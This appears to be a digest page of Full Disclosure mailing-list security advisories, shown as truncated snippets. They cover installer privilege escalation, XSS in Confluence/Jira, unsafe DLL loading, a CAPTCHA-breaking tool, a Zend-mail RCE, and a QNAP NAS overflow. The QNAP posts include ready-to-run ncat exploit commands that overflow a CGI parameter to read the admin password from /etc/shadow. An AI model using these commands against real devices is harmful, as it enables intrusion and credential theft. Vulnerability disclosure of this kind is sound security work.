[FD] Executable installers are vulnerable^WEVIL (case 45): ReadPDF's installers allow escalation of privilege

Hi @ll, the executable installer "InstallTinyPDF.exe", available from , is (surprise.-) vulnerable: 1. DLL hijacking (this is well-known and well-documented; see ,

[FD] Executable installers are vulnerable^WEVIL (case 43): SoftMaker's Office service pack installers allow escalation of privilege

Hi @ll, the service pack installers for SoftMaker Office 201x, available from , are (surprise.-) vulnerable. The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH), creates an UNPROTECTED directory "%TEMP%\7zS\" to extract

Re: [FD] 0-day: QNAP NAS Devices suffer of heap overflow

Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56) [Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "B";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 192.168.5.7 443 | gr

Re: [FD] 0-day: QNAP NAS Devices suffer of heap overflow

And also; == [Stack overflow] == [Remote Host]# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<1489;i++));do echo -en "QUFB";done``echo -en "QUJCQkI="` HTTP/1.0\nHost: BUG\n\n” | ncat --ssl 192.168.5.7 443 HTTP/1.1 200 OK Date: Mon, 02 Jan 2017 11:59:24 GMT

[FD] 0-day: QNAP NAS Devices suffer of heap overflow

Greetings, Twice I tried to use the QNAP Web page (https://aid.qnap.com/event/_module/nas/safe_report/) for reporting vulnerability, and twice I got mailer-daemon back. So, I’ll post my vulnerabilities here instead (Was not meant to be 0-day… whatever). Have a nice day (and happy new year) /b

[FD] Persisted Cross-Site Scripting (XSS) in Confluence Jira Software

=[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 ]== Persisted Cross-Site Scripting (XSS) in Confluence Jira Software Author(s): - Jodson Santos - jodson.san...@tempest.com.br Temp

[FD] Advisories Unsafe Dll in Audacity, telegram and Akamai

=[ Tempest Security Intelligence - ADV-7/2016 ]= Unsafe DLL search path in Audacity 2.1.2 Author: Felipe Xavier Oliveira < engfilipeoliveira89 () gmail.com > Tempest Security Intelligence - Recife, Pernambuco - Brazil =[ Table of Contents ]===

[FD] CINtruder v0.3 released...

Dear list, I have released a new Captcha Intruder (CINtruder) code. It includes a complete Web User Interface (GUI) and some advanced features for: update, manage dictionaries, etc. http://cintruder.03c8.net If you're not already familiar with CINtruder, please read the DESCRIPTION section below

[FD] Zend Framework / zend-mail < 2.4.11 Remote Code Execution (CVE-2016-10034)

Zend Framework < 2.4.11Remote Code Execution (CVE-2016-10034) zend-mail < 2.7.2 Discovered by Dawid Golunski (@dawid_golunski) https://legalhackers.com Desc: An independent research uncovered a critical vulnerability in zend-mail, a Zend Framework's component that could potentially be used by